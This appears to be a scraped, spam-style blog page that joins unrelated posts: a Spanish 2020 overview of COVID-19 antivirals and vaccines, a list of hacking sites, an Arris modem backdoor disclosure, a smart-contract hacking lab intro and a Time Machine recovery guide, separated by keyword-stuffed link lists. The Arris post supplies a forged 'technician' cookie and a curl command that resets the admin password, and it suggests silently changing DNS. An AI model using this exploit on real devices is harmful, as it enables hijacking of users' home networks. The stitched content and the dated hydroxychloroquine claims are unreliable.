Tuesday, 30 June 2020

Antivirales Y Vacunas Contra COVID19


Es el momento de la ciencia y la solidaridad

Una semana después de que China notificara a la OMS los primeros casos de una neumonía severa de origen desconocido, se identificó el agente causante: el nuevo coronavirus SARSCoV2. Unos días después ya estaba disponible el genoma del virus. A día de hoy, son ya más de 970 los artículos científicos accesibles vía PubMed (ref.), en poco menos de tres meses.

Conocer la biología y el genoma del virus nos facilita diseñar estrategias terapéuticas (antivirales) y preventivas (vacunas). Sabemos que el genoma de SARSCoV2 tiene una similitud del 79% con el de SARS. Uno de los genes más importantes es el que codifica para la glicoproteína S de la superficie del virus, que controla la entrada en la célula. Se sabe que el receptor celular es la enzima ACE2 (enzima 2 que convierte la angiotensina, una proteína de la membrana celular que cataliza la conversión de angiotensia I en el nonapéptido angiotensina 1-9 o de angiotensia II en angiotensina 1-7). La llave de entrada del virus a la célula es la proteína S y la cerradura en la célula el receptor ACE2. La proteína S de SARSCoV2 tiene una similitud de un 76% con la de su pariente el SARS, y una mayor afinidad por el receptor ACE2. Esto podría explicar porque el nuevo coronavirus es más contagioso y transmisible que el SARS. La entrada del virus está además facilitada por una proteasa de la propia célula, que se denomina TMPRSS211. Hay otros genes importantes del SARSCoV2 que actúan cuando el virus ya está dentro de la célula. Son el de la ARN polimerasa (RdRp), una enzima que replica el genoma del virus y los de las proteasas C3CLpro y PLpro, que intervienen en el procesamiento de la proteínas virales. Estos genes tiene una similitud con los del SARS de un 95, 95 y 83%, respectivamente.


Figura 1. Estructura y genoma del SARSCoV2.

En estos tres meses escasos, ya hay varias propuestas terapéuticas y vacunas contra el nuevo coronavirus. Jamás la ciencia había avanzado tanto en tan poco tiempo para combatir una epidemia. Muchas de las propuestas vienen de grupos de investigación que llevaban años trabajando contra otros virus, especialmente contra SARS y MERS. Todo ese conocimiento acumulado ha permitido ahora ir a una velocidad nunca antes vista.

Terapias antivirales para curar

Como hemos comentado, conocer con detalle el genoma del virus y cómo se multiplica dentro de las células nos permite proponer antivirales que lo bloquen e inhiban su multiplicación.

Inhibir la entra del virus.

La cloroquina se ha empleado durante años contra la malaria. Se sabe que esta droga (por cierto, disponible y barata) es también un potente antiviral, porque bloquea la entrada del virus a la célula. Un ensayo clínico preliminar ha revelado que es efectivo para reducir la carga viral en pacientes con SARSCoV2 (ref.).

Algunos de los virus que están rodeados con una envoltura, como el SARSCoV2, entran al interior de la célula por endocitosis formando una pequeña vesícula. Una vez dentro de la célula, una bajada de pH promueve que se fusionen la envoltura del virus con la membrana de la vesícula que lo contiene, para así quedar "libre" en el citoplasma. La cloroquina lo que hace es impedir esa bajada de pH, con lo que se inhibe la fusión de las membranas y se impide la entrada del virus al citoplasma celular. Se ha visto que la cloroquina inhibe la replicación del SARSCoV2 in vitro en cultivos celulares. Por eso, se ha ensayado en pacientes con SARSCoV2 la hidroxicloroquina, un derivado de la cloroquina menos tóxico. El tratamiento con hidroxicloroquina combinado con azitromicina (un antibiótico para prevenir complicaciones secundarias por bacterias) ha demostrado, en un ensayo preliminar, que el virus desapareció en el 70% de los pacientes tratados, comparado con el 12,5% de los controles sin tratar.

Figura 2. Ciclo celular del SARSCoV2.

Otras propuestas que se están ensayando son: el barcitinib, un antiinflamatorio aprobado para tratar la artritis reumatoide, que podría inhibir la endocitosis del virus (ref.); y el mesilato de camostat, un fármaco aprobado en Japón para su uso en la inflamación del páncreas, y que inhibe la proteasa celular TMPRSS2 necesaria para la entrada del virus. Se ha comprobado que este compuesto bloquea la entrada del virus en las células pulmonares (ref.).

Inhibir la ARN polimerasa viral.

Quizá uno de los antivirales más prometedores contra el SARSCoV2 sea el remdesivir, un análogo de nucleótidos inhibidor de la ARN polimerasa viral, que impide que el virus se multiplique dentro de la célula. Ya se ha empleado contra el SARS y MERS y se ensayó con éxito en las últimas epidemias de Ébola, y contra otros virus con genoma ARN. Es por tanto un antiviral de amplio espectro. Ya están en curso al menos doce ensayos clínicos en fase II en China y en EE.UU., y ha comenzado otro en fase III con 1.000 pacientes en Asia (ref.).

Otro inhibidor de amplio espectro de la ARN polimerasa viral que ya ha comenzado ensayos clínicos es el favipiravir: los primeros resultados con 340 pacientes chinos han sido satisfactorios. Favipiravir ha sido aprobado para inhibir al virus de la gripe y ensayado contra otros virus ARN.

Inhibidores de las proteasas.

La combinación de ritonavir y lopinavir se ha sugerido que podría inhibir las proteasas del SARCoV2. Estos compuestos ya se usan para tratar la infección por el VIH. El lopinavir es un inhibidor de la proteasa del virus, que se degrada fácilmente en la sangre del paciente. El ritonavir actúa como protector e impide la descomposición del lopinavir, por eso se administran de manera conjunta. Sin embargo, desgraciadamente se acaba de publicar un artículo con 199 pacientes que demuestra que el tratamiento con ritonavir/lopinavir no es efectivo contra el coronavirus (ref.). No obstante, la buena noticia es que hay al menos 27 ensayos clínicos con distintas combinaciones de tratamientos antivirales (interferón alfa-2b, ribavirina, metilprednisolona, azvudina, etc) (ref.).

De momento son tratamientos experimentales, pero que suponen una esperanza para los casos más graves y severos.

Vacunas para el futuro

La otra estrategia para controlar al virus son las vacunas. Pero recordemos que las vacunas son preventivas, se desarrollan ahora para protegernos de la siguiente "oleada" del virus, si es que vuelve. La OMS tiene una lista de al menos 41 candidatos (ref.).

Quizá una de las más avanzadas es la propuesta china, una vacuna recombinante basada en vectores de adenovirus con el gen S de SARSCoV2, que ha sido ensayada ya en monos y se sabe que produce inmunidad. Se va a comenzar un ensayo clínico fase I con 108 voluntarios sanos, entre 18 y 60 años de edad, en los que se probaran tres dosis distintas. El objetivo es comprobar la seguridad de la vacuna (si hay efectos secundarios), y probar qué dosis induce una mayor respuesta de anticuerpos. 

Otras propuestas están siendo promovidas por CEPI (The Coalition for Epidemic Preparedness Innovations). Es una asociación internacional en la que colaboran organizaciones públicas, privadas, civiles y filantrópicas para desarrollar vacunas contras epidemias futuras. En este momento financia ya ocho proyectos de vacunas contra el SARSCoV2 que incluyen vacunas recombinantes, de proteínas y de ácidos nucleicos (ref.). Veamos cuales son.

1. Vacuna recombinante con el virus de sarampión (Instituto Pasteur, Themis Bioscience y Universidad de Pittsburg). Se trata de una vacuna construida en un virus vivo atenuado o defectuoso del sarampión, que se emplea como vector o vehículo, y que contiene un gen que codifica una proteína del virus SARSCoV2. De esta forma, el virus vector presenta directamente el antígeno del SARSCoV2 al sistema inmune para inducir una respuesta protectora. Este consorcio ya tienen experiencia en vacunas similares contra el MERS, VIH, fiebre amarilla, virus del Nilo occidental, dengue y otras enfermedades emergentes. En fase preclínica.

2. Vacuna recombinante con el virus de la gripe (Universidad de Hong Kong). Se trata también de una vacuna viva que emplea como vector en este caso un virus de la gripe atenuado, al que se le ha quitado el gen de virulencia NS1, y que por tanto no es virulento. A este virus vector se le añade un gen del virus SARSCoV2.  Esta propuesta tiene algunas ventajas: podría combinarse con cualquier cepa de virus de la gripe estacional y servir así como vacuna antigripal, puede fabricarse de forma rápida en los mismos sistemas de producción ya existentes para las vacunas contra la gripe, y podrían emplearse como vacuna intranasal vía spray.  En fase preclínica.

3. Vacuna recombinante que emplea como vector el adenovirus de chimpancé Oxford, ChAdOx1 (Jenner Institute, Universidad de Oxford). Este vector atenuado es capaz de portar otro gen que codifique para un antígeno viral. Se ha ensayado en voluntarios con modelos para el MERS, gripe, chikungunya y otros patógenos como malaria y tuberculosis. Esta vacuna puede fabricarse a gran escala en líneas celulares de embriones de aves. El adenovirus recombinante lleva el gen de la glicoproteína S de SARSCoV2. En fase preclínica.

4. Vacuna de proteína recombinante obtenida por tecnología de nanopartículas (Novavax, Inc.). Esta empresa ya tiene en fase clínica III vacunas contra otras infecciones respiratorias como gripe para adultos (Nano-Flu) y virus respiratorio sincitial (RSV-F) y ha fabricado vacunas contra el SARS y el MERS. Su tecnología se basa en producir proteínas recombinantes que se ensamblan en nanopartículas y que se administra con un adyuvante propio, Matrix-M. Este compuesto (una mezcla de saponinas de origen vegetal, colesterol y fosfolípidos) es un inmunógeno bien tolerado capaz de estimular una potente y duradera respuesta inmune inespecífica. La ventaja es que de esta forma se reduciría el número de dosis  necesaria (se evitaría así la revacunación). En fase preclínica.

5. Vacuna de proteína recombinante (Universidad de Queensland), consiste en crear moléculas quiméricas capaces de mantener la estructura tridimensional original del antígeno viral. Utilizan la técnica denominada "molecular clamp", que permite producir vacunas empleado el genoma del virus en un tiempo record. En fase preclínica.

6. Vacuna mRNA-1273 (Moderna, Inc.). Se trata de una vacuna formada por un pequeño fragmento de RNA mensajero con las instrucciones para sintetizar parte de la proteína S del SARSCoV. La idea es que una vez introducido en nuestras células, sean estas mismas las que "fabriquen" esa proteína que actuaría como antígeno y estimularía la producción de anticuerpos. Está ya en fase clínica y se ha comenzado a ensayar en voluntarios sanos.

7. Vacuna de RNA mensajero (CureVac). Se trata de una propuesta similar, moléculas de RNA mensajero recombinantes que sean fácilmente reconocidas por la maquinaria celular y produzcan grandes de antígeno. Se empaquetan en nanopartículas lipídicas u otros vectores. En fase preclínica.

8. Vacuna DNA INO-4800 (Inovio Pharmaceuticals). Se trata de una plataforma que fabrica vacunas sintéticas con DNA del gen S de la superficie del virus. Ya habían desarrollado un prototipo contra el MERS (la vacuna INO-4700)  que se encuentra en fase II. Recientemente publicaron los resultados de la fase I con esta vacuna INO-4700 y comprobaron que era bien tolerada y producía una buena respuesta inmune (altos niveles de anticuerpos y buena respuesta de células T, mantenida durante al menos 60 semanas después de la vacunación). En fase preclínica.

Pero todavía hay más. La propuesta española acaba de recibir financiación exprés por parte del Gobierno español. Se trata de la vacuna del grupo de Luis Enjuanes e Isabel Sola, una vacuna viva atenuada que puede resultar más fácil de fabricar y ser mucho más inmunogénica (mayor capacidad de estimular el sistema inmune). En este caso, la idea es a partir del genoma ARN de virus, retro-trascribirlo a ADN, y sobre esta replica construir mutantes que sean avirulentos. En definitiva, fabricar una copia del virus alterada que sea incapaz de producir la enfermedad, pero que sirva para activar nuestras defensas.

Todavía no existe ningún antiviral ni una vacuna específica contra el SARSCov2 aprobadas . Todas estas propuestas de antivirales y vacunas están en fase experimental. Algunas no funcionaran, no servirán para bloquear al virus, pero las posibilidades de acertar son muchas. Se acaba de publicar además una revisión (ref.) de todo el arsenal terapéutico y vacunas en fase de investigación y desarrollo contra otros coronavirus humanos, como el SARS y el MERS.

Existen más de 2.000 patentes relacionadas con los coronavirus SARS y MERS: 80% sobre agentes terapéuticos, 35% sobre vacunas y 28% sobre técnicas diagnósticas (una patente puede cubrir varios aspectos, por eso el total suma más del 100%). En esa lista hay varios cientos de patentes de anticuerpos, citoquinas, terapias ARN de interferencia y otros interferones que están en fase de investigación y desarrollo para los coronavirus SARS y MERS y que muy bien podrían funcionar contra el nuevo SARSCoV2. También hay varias decenas de patentes sobre posibles vacunas contra SARS y MERS, de las que nos podemos beneficiar para combatir el SARCoV2. Son vacunas de todo tipo: vacunas muertas inactivas, vivas atenuadas, vacunas DNA, de ARN mensajero, VLPs (virus like particles), … Todo esto pone de manifiesto que hay una inmensa cantidad de conocimiento científico que permitirá agilizar ensayos clínicos y experimentales para combatir este virus.

La OMS ha hecho publico un consorcio internacional, denominado Solidarity, cuyo objetivo es buscar un tratamiento eficaz con COVID19. De momento participan ArgentinaBahréinCanadáFranciaIránNoruegaSudáfricaEspañaSuiza Tailandia, y está previsto que cada vez sean más las naciones que se unan en este proyecto de gran ensayo clínico mundial.

No cabe duda: es el momento de la ciencia y la solidaridad. Este partido lo vamos a ganar.

(Este artículo ha sido publicado también en The Conversation, y ha sido traducido al francés y al inglés).

Related word


  1. Curiosidades Hoy
  2. Lifestyle Logo
  3. Viajes 60 Años Comunidad De Madrid
  4. Lifestyle Diseases
  5. Another Word For Viaje
  6. Viaje De Magallanes
  7. Curiosidades Zootropolis
  8. Viaje Marte
  9. Curiosidades Yorkshire
  10. Curiosidades Kpop
  11. What Lifestyle Do You Want
  12. Why Lifestyle Center
  13. Lifestyle Of Ias Officer
  14. Like Lifestyle Brand
  15. Curiosidades Ultimo Capitulo Friends
  16. Curiosidades Outer Banks
  17. Curiosidades De Paises
  18. Lifestyle Diseases List
  19. Viaje Entre Provincias
  20. Curiosidades Valencia
  21. Viajar Vs Recorrer
  22. Viaje Translation
  23. What Lifestyle Can I Afford
  24. Curiosidades Nueva York
  25. To Lifestyle In French
  26. Lifestyle Quiz Questions
  27. Lifestyle Without Barriers
  28. Lifestyle Bowl Chipotle
  29. Viaje 2 Actores
  30. Lifestyle Blog Post Ideas
  31. Viaje 4 De Cristobal Colon
  32. Lifestyle One
  33. Viaje Platino
  34. Curiosidades Y Copias
  35. Lifestyle For Hypertension
  36. Lifestyle Of Akshay Kumar
  37. Lifecycle 9500R
  38. Viaje Na Viagem Gramado
  39. To Lifestyle Synonym
  40. Viaje Entre Regiones
  41. Curiosidades Gatos
  42. Lifestyle 650 Price
  43. Viaje Hamaki
  44. Curiosidades 9 De Julio
  45. Curiosidades The Circle Brasil
  46. 8 Curiosidades Sobre Baratas
  47. Curiosidades Benjamin Lacombe
  48. Curiosidades Jogos Vorazes
  49. Curiosidades Finlandia
  50. Lifestyle 135
  51. Viaje De Chihiro
  52. Curiosidades Filipinas
  53. Lifestyle Nearby
  54. Lifestyle Near Mg Road
  55. Curiosidades Que Vc Nao Sabia
  56. 4 Curiosidades Sobre A Revolução Francesa
  57. Curiosidades Barcelona
  58. Curiosidades Cortas
  59. Lifestyle Yoga
  60. Curiosidades Benjamin Lacombe
  61. Curiosidades 14 De Febrero
  62. Viaje In English
  63. Curiosidades Modern Family
  64. Lifestyle Products
  65. Curiosidades 2019
  66. What'S Viaje In English
  67. To Viaje En Español
  68. Lifestyle Ksa
  69. Curiosidades The 100
  70. Lifestyle Quiz Questions
  71. Curiosidades Ingles
  72. Is Lifestyle A Demographic
  73. Curiosidades Plantas
  74. Lifestyle Near Tambaram
  75. How Lifestyle Affects Aging
  76. Curiosidades Zorro
  77. Lifestyle X3 Spa
  78. Viaje Mais
  79. Curiosidades 8 Apellidos Catalanes
  80. Curiosidades Jogos Vorazes
  81. Curiosidades Literarias
  82. Where To Buy Viaje Cigars
  83. Curiosidades 1 Guerra Mundial
  84. Agencia De Viaje 002
  85. Lifestyle Management
  86. Viaje En El Tiempo Pelicula
  87. How Many Lifestyle Sports Shops In Ireland
  88. Viaje Birthday Blend 2020
  89. Lifestyle For Pets
  90. How Much Do Lifestyle Models Make
  91. Curiosidades Filipinas
  92. Viaje En Helicoptero
  93. Curiosidades Hipopotamo
  94. Lifestyle 901
  95. Curiosidades China
  96. Curiosidades Matematicas
  97. To Lifestyle Factors
  98. Curiosidades Now United
  99. Lifestyle Group
  100. Curiosidades Japon
  101. Viaje Bruce Banner Cigar
  102. Curiosidades Yorkshire
  103. Lifestyle And Mobility
  104. Viaje Tiempo Atras
  105. Lifestyle Zinc
  106. Curiosidades Noruega
  107. Lifestyle Vs Culture
  108. Lifestyle Tips
  109. Viaje Travel And Tours Tacloban
  110. Viaje Espacial
  111. Can Bloco Economico Curiosidades
  112. What Lifestyle Factors Affect Health
  113. Lifestyle Resort
  114. Lifestyle Online
  115. Who Makes Viaje Cigars
  116. Lifestyle Resort
  117. Viaje Coche Fase 0
  118. How Much Lifestyle Cost
  119. Curiosidades Estupidas
  120. Viaje Falabella
  121. Can Lifestyle Blogs Make Money
  122. Curiosidades Sobre Two And A Half Man
  123. Lifestyle Definition
  124. Curiosidades Walt Disney
  125. Lifestyle Blogs Like The Tig
  126. Curiosidades Brooklyn 99
  127. Viaje Full Moon
  128. Curiosidades Instagram
  129. Curiosidades Instagram
  130. Lifestyle Young Thug Lyrics
  131. Curiosidades Van Gogh
  132. Curiosidades Once Upon A Time In Hollywood
  133. Can Lifestyle Have An Effect On Schizophrenia
  134. Curiosidades Biblicas
  135. Lifestyle Without Modern Gadgets
  136. Are Lifestyle Blogs Profitable
  137. To Lifestyle Synonym
  138. Curiosidades Estados Unidos
  139. Viaje Interior
  140. Lifestyle Of The Rich And Famous
  141. Why Lifestyle Medicine
  142. Lifestyle 600
  143. Viaje Birthday Blend 2020 Review
  144. Lifestyle Ultra Sensitive Size
  145. Lifestyle Returns
  146. Can Lifestyle Have An Effect On Schizophrenia
  147. Lifestyle 0
  148. Lifestyle Cycles
  149. Lifestyle 4Wd
  150. Curiosidades Google Maps
Posted by at No comments:

Top 7 Free Websites to Learn Hacking this 2018

  • The Hacker News: The Hacker News — most trusted and widely-acknowledged online cyber security news magazine with in-depth technical coverage for cybersecurity.
  • Metasploit: Find security issues, verify vulnerability mitigations & manage security assessments with Metasploit. Get the worlds best penetration testing software now.
  • HackRead: HackRead is a News Platform that centers on InfoSec, Cyber Crime, Privacy, Surveillance, and Hacking News with full-scale reviews on Social Media Platforms.
  • Packet Storm: Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers.
  • Hacked Gadgets: A resource for DIY project documentation as well as general gadget and technology news.
  • Exploit DB: An archive of exploits and vulnerable software by Offensive Security. The site collects exploits from submissions and mailing lists and concentrates them in a single database.
  • KitPloit: Leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security.
Posted by at No comments:

Thursday, 11 June 2020

Arris Cable Modem Backdoor - I'm A Technician, Trust Me.

Vendor backdoors are the worst. Sloppy coding leading to unintentional "bugdoors" is somewhat defendable, but flat out backdoors are always unacceptable. Todays example is brought to you by Arris. A great quote from their site -
Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.
Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyways, the following was observed on an Arris TG862G cable modem running the following firmware version -TS070563_092012_MODEL_862_GW

After successfully providing the correct login and password to the modems administration page, the following cookie is set (client side):
Cookie: credential=eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9
 All requests must have a valid "credential" cookie set (this was not the case in a previous FW release - whoops) if the cookie is not present the modem will reply with "PLEASE LOGIN". The cookie value is just a base64 encoded json object:
{"valid":true,"technician":false,"credential":"YWRtaW46cGFzc3dvcmQ=","primaryOnly":false,"access":{"ALL":true},"name":"admin"}
And after base64 decoding the "credential" value we get:
{"valid":true,"technician":false,"credential":"admin:password","primaryOnly":false,"access":{"ALL":true},"name":"admin"}
Sweet, the device is sending your credentials on every authenticated request (without HTTPS), essentially they have created basic-auth 2.0 - As the kids say "YOLO". The part that stuck out to me is the "technician" value that is set to "false" - swapping it to "true" didn't do anything exciting, but after messing around a bit I found that the following worked wonderfully:
Cookie: credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9
Which decodes to the following:
{"credential":"dGVjaG5pY2lhbjo="}
And finally:
{"credential":"technician:"} 
Awesome, the username is "technician" and the password is empty. Trying to log into the interface using these credentials does not work :(




That is fairly odd. I can't think of a reasonable reason for a hidden account that is unable to log into the UI. So what exactly can you do with this account? Well, the web application is basically a html/js wrapper to some CGI that gets/sets SNMP values on the modem. It is worth noting that on previous FW revisions the CGI calls did NOT require any authentication and could be called without providing a valid "credential" cookie. That bug was killed a few years ago at HOPE 9.

Now we can resurrect the ability to set/get SNMP values by setting our "technician" account:


That's neat, but we would much rather be using the a fancy "web 2.0" UI that a normal user is accustomed to, instead of manually setting SNMP values like some sort of neckbearded unix admin. Taking a look at the password change functionality appeared to be a dead end as it requires the previous password to set a new one:


Surprisingly the application does check the value of the old password too! Back to digging around the following was observed in the "mib.js" file:
SysCfg.AdminPassword= new Scalar("AdminPassword","1.3.6.1.4.1.4115.1.20.1.1.5.1",4);
Appears that the OID "1.3.6.1.4.1.4115.1.20.1.1.5.1" holds the value of the "Admin" password! Using the "technician" account to get/walk this OID comes up with nothing:
HTTP/1.1 200 OK
Date: Tue, 23 Sep 2014 19:58:40 GMT
Server: lighttpd/1.4.26-devel-5842M
Content-Length: 55
{
"1.3.6.1.4.1.4115.1.20.1.1.5.1.0":"",
"1":"Finish"
}
What about setting a new value? Surely that will not work....



That response looks hopeful. We can now log in with the password "krad_password" for the "admin" user:


This functionality can be wrapped up in the following curl command:
curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' 'http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;'
Of course if you change the password you wouldn't be very sneaky, a better approach would be re-configuring the modems DNS settings perhaps? It's also worth noting that the SNMP set/get is CSRF'able if you were to catch a user who had recently logged into their modem.

The real pain here is that Arris keeps their FW locked up tightly and only allows Cable operators to download revisions/fixes/updates, so you are at the mercy of your Cable operator, even if Arris decides that its worth the time and effort to patch this bug backdoor - you as the end user CANNOT update your device because the interface doesn't provide that functionality to you! Next level engineering.


Related posts


  1. Pentest News
  2. Pentest Windows 7
  3. Pentestmonkey Sql Injection
  4. Pentest Tools Github
  5. Pentest Keys
  6. Hacking With Raspberry Pi
  7. Pentest Vpn
  8. Hacking Device
  9. Pentest Cheat Sheet
  10. How To Pentest A Website With Kali
  11. Pentest Stages
  12. Hacker Website
Posted by at No comments:

Blockchain Exploitation Labs - Part 2 Hacking Blockchain Authorization


Bypassing Blockchain Authorization via Unsecured Functions


Note: Since the first part of this series I have also uploaded some further videos on remediation of reentrancy and dealing with compiler versions when working with this hacking blockchain series.  Head to the console cowboys YouTube account to check those out.  Haha as mentioned before I always forget to post blogs when I get excited making videos and just move on to my next project… So make sure to subscribe to the YouTube if you are waiting for any continuation of a video series.. It may show up there way before here. 

Note 2:  You WILL run into issues when dealing with Ethereum hacking, and you will have to google them as versions and functionality changes often... Be cognizant of versions used hopefully you will not run into to many hard to fix issues. 

In the second part of this lab series we are going to take a look at privacy issues on the blockchain which can result in a vulnerably a traditional system may  not face. Since typically blockchain projects are open source and also sometimes viewable within blockchain explorers but traditional application business logic is not usually available to us. With traditional applications we might not find these issues due to lack of knowledge of internal functionality or inability to read private values on a remote server side script.  After we review some issues we are going to exploit an authorization issues by writing web3.js code to directly bypass vertical authorization restrictions.

Blockchain projects are usually open source projects which allow you to browse their code and see what's going on under the hood.  This is fantastic for a lot of reasons but a developer can run into trouble with this if bad business logic decisions are deployed to the immutable blockchain.  In the first part of this series I mentioned that all uploaded code on the blockchain is immutable. Meaning that if you find a vulnerability it cannot be patched. So let's think about things that can go wrong..

A few things that can go wrong:
  • Randomization functions that use values we can predict if we know the algorithm
  • Hard-coded values such as passwords and private variables you can't change.
  • Publicly called functions which offer hidden functionality
  • Race conditions based on how requirements are calculated

Since this will be rather technical, require some setup and a lot of moving parts we will follow this blog via the video series below posting videos for relevant sections with a brief description of each.  I posted these a little bit ago but have not gotten a chance to post the blog associated with it.  Also note this series is turning into a full lab based blockchain exploitation course so keep a lookout for that.

In this first video you will see how data about your project is readily available on the blockchain in multiple formats for example:
  • ABI data that allows you to interact with methods.
  • Actual application code.
  • Byte code and assembly code.
  • Contract addresses and other data.

 Lab Video Part 1: Blockchain OSINT: 



Once you have the data you need to interact with a contract on the blockchain via some OSINT how do you actually interface with it? That's the question we are going to answer in this second video. We will take the ABI contract array and use it to interact with methods on the blockchain via Web3.js and then show how this correlates to its usage in an HTML file

Lab Video Part 2: Connecting to a Smart Contract: 




Time to Exploit an Application:

Exploit lab time, I created an vulnerable application you can use to follow along in the next video. Lab files can be downloaded from the same location as the last blog located below. Grab the AuthorizationLab.zip file:

Lab file downloads:



Ok so you can see what's running on the blockchain, you can connect to it, now what?   Now we need to find a vulnerability and show how to exploit it. Since we are talking about privacy in this blog and using it to bypass issues. Lets take a look at a simple authorization bypass we can exploit by viewing an authorization coding error and taking advantage of it to bypass restrictions set in the Smart Contract.  You will also learn how to setup a local blockchain for testing purposes and you can download a hackable application to follow along with the exercises in the video..

Lab Video Part 3:  Finding and hacking a Smart Contract Authorization Issue: 





Summary:

In this part of the series you learned a lot, you learned how to transfer your OSINT skills to the blockchain. Leverage the information found to connect to that Smart Contract. You also learned how to interact with methods and search for issues that you can exploit. Finally you used your browsers developer console as a means to attack the blockchain application for privilege escalation.
Related word

Posted by at No comments:

Wednesday, 10 June 2020

Galileo - Web Application Audit Framework

More information
  1. Hacking Linux
  2. Hacking Software
  3. Hacking Linux
  4. Pentest Aws
  5. Hacker Computer
  6. Pentest Box
  7. Pentest With Metasploit
  8. Pentest Azure
  9. Pentest Red Team
  10. Hacking Page
  11. Hacker Box
  12. Pentestmonkey Cheat Sheet
  13. Hacking Language
  14. Hacking
  15. Pentestmonkey
  16. Hacking Tools
  17. Hacker Prank
  18. Pentest Tools Framework
Posted by at No comments:

Recovering Data From An Old Encrypted Time Machine Backup

Recovering data from a backup should be an easy thing to do. At least this is what you expect. Yesterday I had a problem which should have been easy to solve, but it was not. I hope this blog post can help others who face the same problem.


The problem

1. I had an encrypted Time Machine backup which was not used for months
2. This backup was not on an official Apple Time Capsule or on a USB HDD, but on a WD MyCloud NAS
3. I needed files from this backup
4. After running out of time I only had SSH access to the macOS, no GUI

The struggle

By default, Time Machine is one of the best and easiest backup solution I have seen. As long as you stick to the default use case, where you have one active backup disk, life is pink and happy. But this was not my case.

As always, I started to Google what shall I do. One of the first options recommended that I add the backup disk to Time Machine, and it will automagically show the backup snapshots from the old backup. Instead of this, it did not show the old snapshots but started to create a new backup. Panic button has been pressed, backup canceled, back to Google.


Other tutorials recommend to click on the Time Machine icon and pressing alt (Option) key, where I can choose "Browse other backup disks". But this did not list the old Time Machine backup. It did list the backup when selecting disks in Time Machine preferences, but I already tried and failed that way.


YAT (yet another tutorial) recommended to SSH into the NAS, and browse the backup disk, as it is just a simple directory where I can see all the files. But all the files inside where just a bunch of nonsense, no real directory structure.

YAT (yet another tutorial) recommended that I can just easily browse the content of the backup from the Finder by double-clicking on the sparse bundle file. After clicking on it, I can see the disk image on the left part of the Finder, attached as a new disk.
Well, this is true, but because of some bug, when you connect to the Time Capsule, you don't see the sparse bundle file. And I got inconsistent results, for the WD NAS, double-clicking on the sparse bundle did nothing. For the Time Capsule, it did work.
At this point, I had to leave the location where the backup was present, and I only had remote SSH access. You know, if you can't solve a problem, let's complicate things by restrict yourself in solutions.

Finally, I tried to check out some data forensics blogs, and besides some expensive tools, I could find the solution.

The solution

Finally, a blog post provided the real solution - hdiutil.
The best part of hdiutil is that you can provide the read-only flag to it. This can be very awesome when it comes to forensics acquisition.


To mount any NAS via SMB:
mount_smbfs afp://<username>@<NAS_IP>/<Share_for_backup> /<mountpoint>

To mount a Time Capsule share via AFP:
mount_afp afp://any_username:password@<Time_Capsule_IP>/<Share_for_backup> /<mountpoint>

And finally this command should do the job:
hdiutil attach test.sparsebundle -readonly

It is nice that you can provide read-only parameter.

If the backup was encrypted and you don't want to provide the password in a password prompt, use the following:
printf '%s' 'CorrectHorseBatteryStaple' | hdiutil attach test.sparsebundle -stdinpass -readonly

Note: if you receive the error "resource temporarily unavailable", probably another machine is backing up to the device

And now, you can find your backup disk under /Volumes. Happy restoring!

Probably it would have been quicker to either enable the remote GUI, or to physically travel to the system and login locally, but that would spoil the fun.

More information


Posted by at No comments:
Subscribe to: Posts (Atom)